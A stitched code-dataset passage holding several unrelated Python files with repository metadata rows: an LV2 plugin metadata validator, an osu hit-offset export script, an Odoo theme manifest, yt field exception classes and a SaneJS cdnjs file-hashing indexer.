brand = brand[:11]
errors.append("plugin brand has more than 11 characters")
# --------------------------------------------------------------------------------------------------------
# label
label = plugin.get_value(ns_mod.label).get_first().as_string() or ""
if not label:
if len(name) <= 16:
label = name
else:
labels = name.split(" - ",1)[0].split(" ")
if labels[0].lower() in bundle.lower() and len(labels) > 1 and not labels[1].startswith(("(","[")):
label = labels[1]
else:
label = labels[0]
if len(label) > 16:
label = label[:16]
warnings.append("plugin label is missing")
del labels
elif len(label) > 16:
label = label[:16]
errors.append("plugin label has more than 16 characters")
# --------------------------------------------------------------------------------------------------------
# bundles
bundles = []
if useAbsolutePath:
bnodes = lilv.lilv_plugin_get_data_uris(plugin.me)
it = lilv.lilv_nodes_begin(bnodes)
while not lilv.lilv_nodes_is_end(bnodes, it):
bnode = lilv.lilv_nodes_get(bnodes, it)
it = lilv.lilv_nodes_next(bnodes, it)
if bnode is None:
continue
if not lilv.lilv_node_is_uri(bnode):
continue
bpath = os.path.abspath(os.path.dirname(lilv.lilv_uri_to_path(lilv.lilv_node_as_uri(bnode))))
if not bpath.endswith(os.sep):
bpath += os.sep
if bpath not in bundles:
bundles.append(bpath)
if bundle not in bundles:
bundles.append(bundle)
del bnodes, it
# --------------------------------------------------------------------------------------------------------
# get the proper modgui
modguigui = None
nodes = plugin.get_value(ns_modgui.gui)
it = nodes.begin()
while not nodes.is_end(it):
mgui = nodes.get(it)
it = nodes.next(it)
if mgui.me is None:
continue
resdir = world.find_nodes(mgui.me, ns_modgui.resourcesDirectory.me, None).get_first()
if resdir.me is None:
continue
modguigui = mgui
if not useAbsolutePath:
# special build, use first modgui found
break
if os.path.expanduser("~") in lilv.lilv_uri_to_path(resdir.as_string()):
# found a modgui in the home dir, stop here and use it
break
del nodes, it
# --------------------------------------------------------------------------------------------------------
# gui
gui = {}
if modguigui is None or modguigui.me is None:
warnings.append("no modgui available")
else:
# resourcesDirectory *must* be present
modgui_resdir = world.find_nodes(modguigui.me, ns_modgui.resourcesDirectory.me, None).get_first()
if modgui_resdir.me is None:
errors.append("modgui has no resourcesDirectory data")
else:
if useAbsolutePath:
gui['resourcesDirectory'] = lilv.lilv_uri_to_path(modgui_resdir.as_string())
# check if modgui is defined in a separate file
gui['usingSeeAlso'] = os.path.exists(os.path.join(bundle, "modgui.ttl"))
# check if the modgui definition is on its own file and in the user dir
gui['modificableInPlace'] = bool((bundle not in gui['resourcesDirectory'] or gui['usingSeeAlso']) and
os.path.expanduser("~") in gui['resourcesDirectory'])
else:
gui['resourcesDirectory'] = modgui_resdir.as_string().replace(bundleuri,"",1)
# icon and settings templates
modgui_icon = world.find_nodes(modguigui.me, ns_modgui.iconTemplate .me, None).get_first()
modgui_setts = world.find_nodes(modguigui.me, ns_modgui.settingsTemplate.me, None).get_first()
if modgui_icon.me is None:
errors.append("modgui has no iconTemplate data")
else:
iconFile = lilv.lilv_uri_to_path(modgui_icon.as_string())
if os.path.exists(iconFile):
gui['iconTemplate'] = iconFile if useAbsolutePath else iconFile.replace(bundle,"",1)
else:
errors.append("modgui iconTemplate file is missing")
del iconFile
if modgui_setts.me is not None:
settingsFile = lilv.lilv_uri_to_path(modgui_setts.as_string())
if os.path.exists(settingsFile):
gui['settingsTemplate'] = settingsFile if useAbsolutePath else settingsFile.replace(bundle,"",1)
else:
errors.append("modgui settingsTemplate file is missing")
del settingsFile
# javascript and stylesheet files
modgui_script = world.find_nodes(modguigui.me, ns_modgui.javascript.me, None).get_first()
modgui_style = world.find_nodes(modguigui.me, ns_modgui.stylesheet.me, None).get_first()
if modgui_script.me is not None:
javascriptFile = lilv.lilv_uri_to_path(modgui_script.as_string())
if os.path.exists(javascriptFile):
gui['javascript'] = javascriptFile if useAbsolutePath else javascriptFile.replace(bundle,"",1)
else:
errors.append("modgui javascript file is missing")
del javascriptFile
if modgui_style.me is None:
errors.append("modgui has no stylesheet data")
else:
stylesheetFile = lilv.lilv_uri_to_path(modgui_style.as_string())
if os.path.exists(stylesheetFile):
gui['stylesheet'] = stylesheetFile if useAbsolutePath else stylesheetFile.replace(bundle,"",1)
else:
errors.append("modgui stylesheet file is missing")
del stylesheetFile
# template data for backwards compatibility
# FIXME remove later once we got rid of all templateData files
modgui_templ = world.find_nodes(modguigui.me, ns_modgui.templateData.me, None).get_first()
if modgui_templ.me is not None:
warnings.append("modgui is using old deprecated templateData")
templFile = lilv.lilv_uri_to_path(modgui_templ.as_string())
if os.path.exists(templFile):
with open(templFile, 'r') as fd:
try:
data = json.loads(fd.read())
except:
data = {}
keys = list(data.keys())
if 'author' in keys:
gui['brand'] = data['author']
if 'label' in keys:
gui['label'] = data['label']
if 'color' in keys:
gui['color'] = data['color']
if 'knob' in keys:
gui['knob'] = data['knob']
if 'controls' in keys:
index = 0
ports = []
for ctrl in data['controls']:
ports.append({
'index' : index,
'name' : ctrl['name'],
'symbol': ctrl['symbol'],
})
index += 1
gui['ports'] = ports
del templFile
# screenshot and thumbnail
modgui_scrn = world.find_nodes(modguigui.me, ns_modgui.screenshot.me, None).get_first()
modgui_thumb = world.find_nodes(modguigui.me, ns_modgui.thumbnail .me, None).get_first()
if modgui_scrn.me is not None:
gui['screenshot'] = lilv.lilv_uri_to_path(modgui_scrn.as_string())
if not os.path.exists(gui['screenshot']):
errors.append("modgui screenshot file is missing")
if not useAbsolutePath:
gui['screenshot'] = gui['screenshot'].replace(bundle,"",1)
else:
errors.append("modgui has no screnshot data")
if modgui_thumb.me is not None:
gui['thumbnail'] = lilv.lilv_uri_to_path(modgui_thumb.as_string())
if not os.path.exists(gui['thumbnail']):
errors.append("modgui thumbnail file is missing")
if not useAbsolutePath:
gui['thumbnail'] = gui['thumbnail'].replace(bundle,"",1)
else:
errors.append("modgui has no thumbnail data")
# extra stuff, all optional
modgui_brand = world.find_nodes(modguigui.me, ns_modgui.brand.me, None).get_first()
modgui_label = world.find_nodes(modguigui.me, ns_modgui.label.me, None).get_first()
modgui_model = world.find_nodes(modguigui.me, ns_modgui.model.me, None).get_first()
modgui_panel = world.find_nodes(modguigui.me, ns_modgui.panel.me, None).get_first()
modgui_color = world.find_nodes(modguigui.me, ns_modgui.color.me, None).get_first()
modgui_knob = world.find_nodes(modguigui.me, ns_modgui.knob .me, None).get_first()
if modgui_brand.me is not None:
gui['brand'] = modgui_brand.as_string()
if modgui_label.me is not None:
gui['label'] = modgui_label.as_string()
if modgui_model.me is not None:
gui['model'] = modgui_model.as_string()
if modgui_panel.me is not None:
gui['panel'] = modgui_panel.as_string()
if modgui_color.me is not None:
gui['color'] = modgui_color.as_string()
if modgui_knob.me is not None:
gui['knob'] = modgui_knob.as_string()
# ports
errpr = False
sybls = []
ports = []
nodes = world.find_nodes(modguigui.me, ns_modgui.port.me, None)
it = lilv.lilv_nodes_begin(nodes.me)
while not lilv.lilv_nodes_is_end(nodes.me, it):
port = lilv.lilv_nodes_get(nodes.me, it)
it = lilv.lilv_nodes_next(nodes.me, it)
if port is None:
break
port_indx = world.find_nodes(port, ns_lv2core.index .me, None).get_first()
port_symb = world.find_nodes(port, ns_lv2core.symbol.me, None).get_first()
port_name = world.find_nodes(port, ns_lv2core.name .me, None).get_first()
if None in (port_indx.me, port_name.me, port_symb.me):
if not errpr:
errors.append("modgui has some invalid port data")
errpr = True
continue
port_indx = port_indx.as_int()
port_symb = port_symb.as_string()
port_name = port_name.as_string()
ports.append({
'index' : port_indx,
'symbol': port_symb,
'name' : port_name,
})
if port_symb not in sybls:
sybls.append(port_symb)
elif not errpr:
errors.append("modgui has some duplicated port symbols")
errpr = True
# sort ports
if len(ports) > 0:
ports2 = {}
for port in ports:
ports2[port['index']] = port
gui['ports'] = [ports2[i] for i in ports2]
del ports2
# cleanup
del ports, nodes, it
# --------------------------------------------------------------------------------------------------------
# ports
index = 0
ports = {
'audio' : { 'input': [], 'output': [] },
'control': { 'input': [], 'output': [] },
'midi' : { 'input': [], 'output': [] }
}
portsymbols = []
portnames = []
# function for filling port info
def fill_port_info(port):
# base data
portname = lilv.lilv_node_as_string(port.get_name()) or ""
if not portname:
portname = "_%i" % index
errors.append("port with index %i has no name" % index)
portsymbol = lilv.lilv_node_as_string(port.get_symbol()) or ""
if not portsymbol:
portsymbol = "_%i" % index
errors.append("port with index %i has no symbol" % index)
# check for duplicate names
if portname in portsymbols:
warnings.append("port name '%s' is not unique" % portname)
else:
portnames.append(portname)
# check for duplicate symbols
if portsymbol in portsymbols:
errors.append("port symbol '%s' is not unique" % portsymbol)
else:
portsymbols.append(portsymbol)
# short name
psname = lilv.lilv_nodes_get_first(port.get_value(ns_lv2core.shortName.me))
if psname is not None:
psname = lilv.lilv_node_as_string(psname) or ""
if not psname:
psname = get_short_port_name(portname)
if len(psname) > 16:
warnings.append("port '%s' name is too big, reduce the name size or provide a shortName" % portname)
elif len(psname) > 16:
psname = psname[:16]
errors.append("port '%s' short name has more than 16 characters" % portname)
# check for old style shortName
if port.get_value(ns_lv2core.shortname.me) is not None:
errors.append("port '%s' short name is using old style 'shortname' instead of 'shortName'" % portname)
# port types
types = [typ.rsplit("#",1)[-1].replace("Port","",1) for typ in get_port_data(port, ns_rdf.type_)]
if "Atom" in types \
and port.supports_event(ns_midi.MidiEvent.me) \
and lilv.Nodes(port.get_value(ns_atom.bufferType.me)).get_first() == ns_atom.Sequence:
types.append("MIDI")
#if "Morph" in types:
#morphtyp = lilv.lilv_nodes_get_first(port.get_value(ns_morph.supportsType.me))
#if morphtyp is not None:
#morphtyp = lilv.lilv_node_as_uri(morphtyp)
#if morphtyp:
#types.append(morphtyp.rsplit("#",1)[-1].replace("Port","",1))
# port comment
pcomment = (get_port_data(port, ns_rdfs.comment) or [""])[0]
# port designation
designation = (get_port_data(port, ns_lv2core.designation) or [""])[0]
# port rangeSteps
rangeSteps = (get_port_data(port, ns_mod.rangeSteps) or get_port_data(port, ns_pprops.rangeSteps) or [None])[0]
# port properties
properties = [typ.rsplit("#",1)[-1] for typ in get_port_data(port, ns_lv2core.portProperty)]
# data
ranges = {}
scalepoints = []
# unit block
ulabel = ""
urender = ""
usymbol = ""
# control and cv must contain ranges, might contain scale points
if "Control" in types or "CV" in types:
isInteger = "integer" in properties
if isInteger and "CV" in types:
errors.append("port '%s' has integer property and CV type" % portname)
xdefault = lilv.lilv_nodes_get_first(port.get_value(ns_mod.default.me)) or \
lilv.lilv_nodes_get_first(port.get_value(ns_lv2core.default.me))
xminimum = lilv.lilv_nodes_get_first(port.get_value(ns_mod.minimum.me)) or \
lilv.lilv_nodes_get_first(port.get_value(ns_lv2core.minimum.me))
xmaximum = lilv.lilv_nodes_get_first(port.get_value(ns_mod.maximum.me)) or \
lilv.lilv_nodes_get_first(port.get_value(ns_lv2core.maximum.me))
if xminimum is not None and xmaximum is not None:
if isInteger:
if is_integer(lilv.lilv_node_as_string(xminimum)):
ranges['minimum'] = lilv.lilv_node_as_int(xminimum)
else:
ranges['minimum'] = lilv.lilv_node_as_float(xminimum)
if fmod(ranges['minimum'], 1.0) == 0.0:
warnings.append("port '%s' has integer property but minimum value is float" % portname)
else:
errors.append("port '%s' has integer property but minimum value has non-zero decimals" % portname)
ranges['minimum'] = int(ranges['minimum'])
if is_integer(lilv.lilv_node_as_string(xmaximum)):
ranges['maximum'] = lilv.lilv_node_as_int(xmaximum)
else:
ranges['maximum'] = lilv.lilv_node_as_float(xmaximum)
if fmod(ranges['maximum'], 1.0) == 0.0:
warnings.append("port '%s' has integer property but maximum value is float" % portname)
else:
errors.append("port '%s' has integer property but maximum value has non-zero decimals" % portname)
ranges['maximum'] = int(ranges['maximum'])
else:
ranges['minimum'] = lilv.lilv_node_as_float(xminimum)
ranges['maximum'] = lilv.lilv_node_as_float(xmaximum)
if is_integer(lilv.lilv_node_as_string(xminimum)):
warnings.append("port '%s' minimum value is an integer" % portname)
if is_integer(lilv.lilv_node_as_string(xmaximum)):
warnings.append("port '%s' maximum value is an integer" % portname)
if ranges['minimum'] >= ranges['maximum']:
ranges['maximum'] = ranges['minimum'] + (1 if isInteger else 0.1)
errors.append("port '%s' minimum value is equal or higher than its maximum" % portname)
if xdefault is not None:
if isInteger:
if is_integer(lilv.lilv_node_as_string(xdefault)):
ranges['default'] = lilv.lilv_node_as_int(xdefault)
else:
ranges['default'] = lilv.lilv_node_as_float(xdefault)
if fmod(ranges['default'], 1.0) == 0.0:
warnings.append("port '%s' has integer property but default value is float" % portname)
else:
errors.append("port '%s' has integer property but default value has non-zero decimals" % portname)
ranges['default'] = int(ranges['default'])
else:
ranges['default'] = lilv.lilv_node_as_float(xdefault)
if is_integer(lilv.lilv_node_as_string(xdefault)):
warnings.append("port '%s' default value is an integer" % portname)
testmin = ranges['minimum']
testmax = ranges['maximum']
if "sampleRate" in properties:
testmin *= 48000
testmax *= 48000
if not (testmin <= ranges['default'] <= testmax):
ranges['default'] = ranges['minimum']
errors.append("port '%s' default value is out of bounds" % portname)
else:
ranges['default'] = ranges['minimum']
if "Input" in types:
errors.append("port '%s' is missing default value" % portname)
else:
if isInteger:
ranges['minimum'] = 0
ranges['maximum'] = 1
ranges['default'] = 0
else:
ranges['minimum'] = -1.0 if "CV" in types else 0.0
ranges['maximum'] = 1.0
ranges['default'] = 0.0
if "CV" not in types and designation != "http://lv2plug.in/ns/lv2core#latency":
errors.append("port '%s' is missing value ranges" % portname)
nodes = port.get_scale_points()
if nodes is not None:
scalepoints_unsorted = []
it = lilv.lilv_scale_points_begin(nodes)
while not lilv.lilv_scale_points_is_end(nodes, it):
sp = lilv.lilv_scale_points_get(nodes, it)
it = lilv.lilv_scale_points_next(nodes, it)
if sp is None:
continue
label = lilv.lilv_scale_point_get_label(sp)
value = lilv.lilv_scale_point_get_value(sp)
if label is None:
errors.append("a port scalepoint is missing its label")
continue
label = lilv.lilv_node_as_string(label) or ""
if not label:
errors.append("a port scalepoint is missing its label")
continue
if value is None:
errors.append("port scalepoint '%s' is missing its value" % label)
continue
if isInteger:
if is_integer(lilv.lilv_node_as_string(value)):
value = lilv.lilv_node_as_int(value)
else:
value = lilv.lilv_node_as_float(value)
if fmod(value, 1.0) == 0.0:
warnings.append("port '%s' has integer property but scalepoint '%s' value is float" % (portname, label))
else:
errors.append("port '%s' has integer property but scalepoint '%s' value has non-zero decimals" % (portname, label))
value = int(value)
else:
if is_integer(lilv.lilv_node_as_string(value)):
warnings.append("port '%s' scalepoint '%s' value is an integer" % (portname, label))
value = lilv.lilv_node_as_float(value)
if ranges['minimum'] <= value <= ranges['maximum']:
scalepoints_unsorted.append((value, label))
else:
errors.append(("port scalepoint '%s' has an out-of-bounds value:\n" % label) +
("%d < %d < %d" if isInteger else "%f < %f < %f") % (ranges['minimum'], value, ranges['maximum']))
if len(scalepoints_unsorted) != 0:
unsorted = dict(s for s in scalepoints_unsorted)
values = list(v for v, l in scalepoints_unsorted)
values.sort()
scalepoints = list({ 'value': v, 'label': unsorted[v] } for v in values)
del unsorted, values
del scalepoints_unsorted
if "enumeration" in properties and len(scalepoints) <= 1:
errors.append("port '%s' wants to use enumeration but doesn't have enough values" % portname)
properties.remove("enumeration")
# control ports might contain unit
if "Control" in types:
# unit
uunit = lilv.lilv_nodes_get_first(port.get_value(ns_units.unit.me))
if uunit is not None:
uuri = lilv.lilv_node_as_uri(uunit)
# using pre-existing lv2 unit
if uuri is not None and uuri.startswith("http://lv2plug.in/ns/"):
uuri = uuri.replace("http://lv2plug.in/ns/extensions/units#","",1)
alnum = uuri.isalnum()
if not alnum:
errors.append("port '%s' has wrong lv2 unit uri" % portname)
uuri = uuri.rsplit("#",1)[-1].rsplit("/",1)[-1]
ulabel, urender, usymbol = get_port_unit(uuri)
if alnum and not (ulabel and urender and usymbol):
errors.append("port '%s' has unknown lv2 unit (our bug?, data is '%s', '%s', '%s')" % (portname,
ulabel,
urender,
usymbol))
# using custom unit
else:
xlabel = world.find_nodes(uunit, ns_rdfs .label.me, None).get_first()
xrender = world.find_nodes(uunit, ns_units.render.me, None).get_first()
xsymbol = world.find_nodes(uunit, ns_units.symbol.me, None).get_first()
if xlabel.me is not None:
ulabel = xlabel.as_string()
else:
errors.append("port '%s' has custom unit with no label" % portname)
if xrender.me is not None:
urender = xrender.as_string()
else:
errors.append("port '%s' has custom unit with no render" % portname)
if xsymbol.me is not None:
usymbol = xsymbol.as_string()
else:
errors.append("port '%s' has custom unit with no symbol" % portname)
return (types, {
'name' : portname,
'symbol' : portsymbol,
'ranges' : ranges,
'units' : {
'label' : ulabel,
'render': urender,
'symbol': usymbol,
} if "Control" in types and ulabel and urender and usymbol else {},
'comment' : pcomment,
'designation': designation,
'properties' : properties,
'rangeSteps' : rangeSteps,
'scalePoints': scalepoints,
'shortName' : psname,
})
for p in (plugin.get_port_by_index(i) for i in range(plugin.get_num_ports())):
types, info = fill_port_info(p)
info['index'] = index
index += 1
isInput = "Input" in types
types.remove("Input" if isInput else "Output")
for typ in [typl.lower() for typl in types]:
if typ not in ports.keys():
ports[typ] = { 'input': [], 'output': [] }
ports[typ]["input" if isInput else "output"].append(info)
# --------------------------------------------------------------------------------------------------------
# presets
def get_preset_data(preset):
world.load_resource(preset.me)
uri = preset.as_string() or ""
label = world.find_nodes(preset.me, ns_rdfs.label.me, None).get_first().as_string() or ""
if not uri:
errors.append("preset with label '%s' has no uri" % (label or "<unknown>"))
if not label:
errors.append("preset with uri '%s' has no label" % (uri or "<unknown>"))
return (uri, label)
presets = []
presets_related = plugin.get_related(ns_pset.Preset)
presets_data = list(LILV_FOREACH(presets_related, get_preset_data))
if len(presets_data) != 0:
unsorted = dict(p for p in presets_data)
uris = list(unsorted.keys())
uris.sort()
presets = list({ 'uri': p, 'label': unsorted[p] } for p in uris)
del unsorted, uris
del presets_related
# --------------------------------------------------------------------------------------------------------
# done
return {
'uri' : uri,
'name': name,
'binary' : binary,
'brand' : brand,
'label' : label,
'license': license,
'comment': comment,
'category' : get_category(plugin.get_value(ns_rdf.type_)),
'microVersion': microVersion,
'minorVersion': minorVersion,
'version' : version,
'stability': stability,
'author' : author,
'bundles': bundles,
'gui' : gui,
'ports' : ports,
'presets': presets,
'errors' : errors,
'warnings': warnings,
}
# ------------------------------------------------------------------------------------------------------------
# get_plugin_info_helper
# Get info from a simple URI, without the need of your own lilv world
# This is used by get_plugins_info in MOD-SDK
def get_plugin_info_helper(uri):
world = lilv.World()
world.load_all()
plugins = world.get_all_plugins()
return [get_plugin_info(world, p, False) for p in plugins]
# ------------------------------------------------------------------------------------------------------------
# get_plugins_info
# Get plugin-related info from a list of lv2 bundles
# @a bundles is a list of strings, consisting of directories in the filesystem (absolute pathnames).
def get_plugins_info(bundles):
# if empty, do nothing
if len(bundles) == 0:
raise Exception('get_plugins_info() - no bundles provided')
# Create our own unique lilv world
# We'll load the selected bundles and get all plugins from it
world = lilv.World()
# this is needed when loading specific bundles instead of load_all
# (these functions are not exposed via World yet)
lilv.lilv_world_load_specifications(world.me)
lilv.lilv_world_load_plugin_classes(world.me)
# load all bundles
for bundle in bundles:
# lilv wants the last character as the separator
bundle = os.path.abspath(bundle)
if not bundle.endswith(os.sep):
bundle += os.sep
# convert bundle string into a lilv node
bundlenode = lilv.lilv_new_file_uri(world.me, None, bundle)
# load the bundle
world.load_bundle(bundlenode)
# free bundlenode, no longer needed
lilv.lilv_node_free(bundlenode)
# get all plugins available in the selected bundles
plugins = world.get_all_plugins()
# make sure the bundles include something
if plugins.size() == 0:
raise Exception('get_plugins_info() - selected bundles have no plugins')
# return all the info
return [get_plugin_info(world, p, False) for p in plugins]
# ------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
from sys import argv, exit
from pprint import pprint
#get_plugins_info(argv[1:])
#for i in get_plugins_info(argv[1:]): pprint(i)
#exit(0)
for i in get_plugins_info(argv[1:]):
warnings = i['warnings'].copy()
if 'plugin brand is missing' in warnings:
i['warnings'].remove('plugin brand is missing')
if 'plugin label is missing' in warnings:
i['warnings'].remove('plugin label is missing')
if 'no modgui available' in warnings:
i['warnings'].remove('no modgui available')
for warn in warnings:
if "has no short name" in warn:
i['warnings'].remove(warn)
pprint({
'uri' : i['uri'],
'errors' : i['errors'],
'warnings': i['warnings']
}, width=200)
# ------------------------------------------------------------------------------------------------------------
| 38.94844 | 147 | 0.529977 | 372 | 0.00648 | 154 | 0.002682 | 0 | 0 | 0 | 0 | 16,777 | 0.292231 |
d37c7110bc4a79d498454be90a36a6776d0d7a36 | 1,747 | py | Python | scripts/save_hitoffsets.py | abraker95/ultimate_osu_analyzer | bea58c997d13c3f461ccbe682f52799f0f88fdea | [
"MIT"
] | 23 | 2019-02-27T06:20:15.000Z | 2022-03-31T22:54:11.000Z | scripts/save_hitoffsets.py | abraker95/ultimate_osu_analyzer | bea58c997d13c3f461ccbe682f52799f0f88fdea | [
"MIT"
] | 38 | 2019-03-03T17:35:39.000Z | 2021-08-23T20:43:34.000Z | scripts/save_hitoffsets.py | abraker95/ultimate_osu_analyzer | bea58c997d13c3f461ccbe682f52799f0f88fdea | [
"MIT"
] | 4 | 2020-03-30T20:43:14.000Z | 2022-03-06T19:40:15.000Z |
import os
'''
This script takes a beatmap file and a bunch of replays, calculates hitoffsets for each replay and saves them
to a *.csv file. This script works for std gamemode only.
'''
class SaveHitoffsets():
def create_dir(self, dir_path):
if not os.path.exists(dir_path):
try: os.mkdir(dir_path)
except OSError: print(f'failed to create folder: {dir_path}')
def run(self, beatmap_name, beatmap_filepath, replay_folder):
self.create_dir('download/osu/hitoffsets')
self.create_dir(f'download/osu/hitoffsets/{beatmap_name}')
replay_filenames = [ f for f in os.listdir(replay_folder) if os.path.isfile(os.path.join(replay_folder, f)) ]
replay_filepaths = [ f'{replay_folder}/{replay_filename}' for replay_filename in replay_filenames ]
print('Loading map...')
beatmap = BeatmapIO.open_beatmap(beatmap_filepath)
print('Loading map data...')
map_data = StdMapData.get_aimpoint_data(beatmap.hitobjects)
print('Loading replays...')
replays = [ ReplayIO.open_replay(replay_filepath) for replay_filepath in replay_filepaths ]
print('Loading replay data...')
replay_data = [ StdReplayData.get_replay_data(replay.play_data) for replay in replays ]
print('Loading scores...')
score_data = [ StdScoreData.get_score_data(data, map_data) for data in replay_data ]
for replay_filename, score in zip(replay_filenames, score_data):
replay_filename = replay_filename.split('.')[0]
data = score[:, [StdScoreDataEnums.TIME.value, StdScoreDataEnums.HIT_OFFSET.value ]]
CmdUtils.export_csv(f'download/osu/hitoffsets/{beatmap_name}/{replay_filename}', data.T) | 44.794872 | 117 | 0.691471 | 1,558 | 0.891815 | 0 | 0 | 0 | 0 | 0 | 0 | 477 | 0.273039 |
d37dcd3460178c5f2fd87503fdb31b744dd39932 | 779 | py | Python | theme_clean/__manifest__.py | YnievesDotNetTeam/addons | 2dd619ed7897a61bedef720d73509cb693a7f6cf | [
"MIT"
] | null | null | null | theme_clean/__manifest__.py | YnievesDotNetTeam/addons | 2dd619ed7897a61bedef720d73509cb693a7f6cf | [
"MIT"
] | null | null | null | theme_clean/__manifest__.py | YnievesDotNetTeam/addons | 2dd619ed7897a61bedef720d73509cb693a7f6cf | [
"MIT"
] | null | null | null | {
'name': 'Clean Theme',
'description': 'Clean Theme',
'category': 'Theme/Services',
'summary': 'Corporate, Business, Tech, Services',
'sequence': 120,
'version': '2.0',
'author': 'Odoo S.A.',
'depends': ['theme_common', 'website_animate'],
'data': [
'views/assets.xml',
'views/image_content.xml',
'views/snippets/s_cover.xml',
'views/snippets/s_carousel.xml',
'views/snippets/s_text_image.xml',
'views/snippets/s_three_columns.xml',
'views/snippets/s_call_to_action.xml',
],
'images': [
'static/description/Clean_description.jpg',
'static/description/clean_screenshot.jpg',
],
'license': 'LGPL-3',
'live_test_url': 'https://theme-clean.odoo.com',
}
| 28.851852 | 53 | 0.594352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 567 | 0.727856 |
d37e865328432ac353f4b58343c348a7671627dc | 1,283 | py | Python | yt/fields/field_exceptions.py | neutrinoceros2/yt | 8cabf6091414e4d9a5037c4ff49199adf0ae64d6 | [
"BSD-3-Clause-Clear"
] | null | null | null | yt/fields/field_exceptions.py | neutrinoceros2/yt | 8cabf6091414e4d9a5037c4ff49199adf0ae64d6 | [
"BSD-3-Clause-Clear"
] | null | null | null | yt/fields/field_exceptions.py | neutrinoceros2/yt | 8cabf6091414e4d9a5037c4ff49199adf0ae64d6 | [
"BSD-3-Clause-Clear"
] | null | null | null | class ValidationException(Exception):
pass
class NeedsGridType(ValidationException):
def __init__(self, ghost_zones=0, fields=None):
self.ghost_zones = ghost_zones
self.fields = fields
def __str__(self):
return f"({self.ghost_zones}, {self.fields})"
class NeedsOriginalGrid(NeedsGridType):
def __init__(self):
self.ghost_zones = 0
class NeedsDataField(ValidationException):
def __init__(self, missing_fields):
self.missing_fields = missing_fields
def __str__(self):
return f"({self.missing_fields})"
class NeedsProperty(ValidationException):
def __init__(self, missing_properties):
self.missing_properties = missing_properties
def __str__(self):
return f"({self.missing_properties})"
class NeedsParameter(ValidationException):
def __init__(self, missing_parameters):
self.missing_parameters = missing_parameters
def __str__(self):
return f"({self.missing_parameters})"
class NeedsConfiguration(ValidationException):
def __init__(self, parameter, value):
self.parameter = parameter
self.value = value
def __str__(self):
return f"(Needs {self.parameter} = {self.value})"
class FieldUnitsError(Exception):
pass
| 23.759259 | 57 | 0.699922 | 1,261 | 0.982853 | 0 | 0 | 0 | 0 | 0 | 0 | 166 | 0.129384 |
d37f7f65c54c00d4b7ca2de97d0ffc3744d354d3 | 5,923 | py | Python | sanejs/sanejs.py | Lookyloo/sanejs | 129ee49e538184e5da595a0cb0b3d3b782e60687 | [
"BSD-2-Clause"
] | 2 | 2021-05-20T14:15:30.000Z | 2021-07-06T15:06:32.000Z | sanejs/sanejs.py | Lookyloo/sanejs | 129ee49e538184e5da595a0cb0b3d3b782e60687 | [
"BSD-2-Clause"
] | 56 | 2021-07-13T15:54:39.000Z | 2022-03-31T14:03:50.000Z | sanejs/sanejs.py | Lookyloo/sanejs | 129ee49e538184e5da595a0cb0b3d3b782e60687 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import hashlib
import json
import time
from redis import Redis
from git import Repo # type: ignore
from .helpers import get_homedir, get_socket_path
"""
sha: set of libname|version|fullpath
libname|version: hash of fullpath -> sha
"""
# We assume the initialisation of the submodule is done before calling this class.
class SaneJS():
def __init__(self, loglevel: int=logging.DEBUG) -> None:
self.__init_logger(loglevel)
self.libs_path = get_homedir() / 'cdnjs' / 'ajax' / 'libs'
self.redis_lookup = Redis(unix_socket_path=get_socket_path('lookup'), decode_responses=True)
self.cdnjs_repo = Repo(str(get_homedir() / 'cdnjs'))
def __init_logger(self, loglevel: int):
self.logger = logging.getLogger(f'{self.__class__.__name__}')
self.logger.setLevel(loglevel)
def _pull_dnsjs(self):
last_commit_ts = self.redis_lookup.get('last_commit')
if not last_commit_ts or int(last_commit_ts) < time.time() - 10000:
self.cdnjs_repo.remote('origin').pull()
return True
return False
def compute_hashes(self, force_recompute: bool=False):
'''Compute the hashes for the (new) files, create a file in the root directory of each library'''
if force_recompute:
self.logger.info('Force recompute and re-cache everything.')
self.redis_lookup.flushdb()
if not self._pull_dnsjs():
return
self.logger.debug('Compute hashes.')
for libname in self.libs_path.iterdir():
# libname is the path to the library, it contains a directory for each version
if not libname.is_dir():
continue
short_libname = libname.as_posix().replace(self.libs_path.as_posix() + '/', '')
self.logger.info(f'Processing {short_libname}.')
all_hashes_lib = {}
p = self.redis_lookup.pipeline()
p.sadd('all_libraries', short_libname)
for version in libname.iterdir():
# This is the directory for a version of the library. It can contain all kind of directories and files
if not version.is_dir():
if version.name not in ['package.json', 'hashes.json', '.donotoptimizepng']:
# packages.json is expected, and we don't care
self.logger.warning(f'That is it Oo -> {version}.')
continue
short_version = version.as_posix().replace(libname.as_posix() + '/', '')
if force_recompute or not (version / 'hashes.json').exists():
# Only compute the *new* hashes (unless specified)
to_save = {}
for to_hash in version.glob('**/*'):
if not to_hash.is_file() or to_hash.name == 'hashes.json':
continue
# The file may or may not have a new line at the end.
# The files we want to check against may or may not have the new line at the end.
# We will compute both hashes.
with open(to_hash, 'rb') as f_to_h:
content = f_to_h.read()
file_hash_default = hashlib.sha512(content)
if content:
if content[-1:] == b'\n':
# has newline
file_hash_newline = hashlib.sha512(content)
file_hash_no_newline = hashlib.sha512(content[:-1])
else:
# Doesn't have newline
file_hash_no_newline = hashlib.sha512(content)
file_hash_newline = hashlib.sha512(content + b'\n')
else:
# Empty file
file_hash_newline = file_hash_default
file_hash_newline = file_hash_default
filepath = to_hash.as_posix().replace(version.as_posix() + '/', '')
to_save[filepath] = {'newline': file_hash_newline.hexdigest(), 'no_newline': file_hash_no_newline.hexdigest(), 'default': file_hash_default.hexdigest()}
p.sadd(file_hash_newline.hexdigest(), f'{short_libname}|{short_version}|{filepath}')
p.sadd(file_hash_no_newline.hexdigest(), f'{short_libname}|{short_version}|{filepath}')
p.hset(f'{short_libname}|{short_version}', filepath, file_hash_default.hexdigest())
p.sadd(short_libname, short_version)
with open((version / 'hashes.json'), 'w') as f:
# Save the hashes in the directory (aka cache it)
json.dump(to_save, f, indent=2)
else:
# Just load the cached hashes
with open((version / 'hashes.json')) as f:
to_save = json.load(f)
for filepath, f_hash in to_save.items():
p.sadd(f_hash['newline'], f'{short_libname}|{short_version}|{filepath}')
p.sadd(f_hash['no_newline'], f'{short_libname}|{short_version}|{filepath}')
p.hset(f'{short_libname}|{short_version}', filepath, f_hash['default'])
all_hashes_lib[version.name] = to_save
with open((libname / 'hashes.json'), 'w') as f:
# Write a file with all the hashes for all the versions at the root directory of the library
json.dump(all_hashes_lib, f, indent=2)
p.execute()
self.redis_lookup.set('ready', 1)
self.logger.debug('Compute hashes done.')
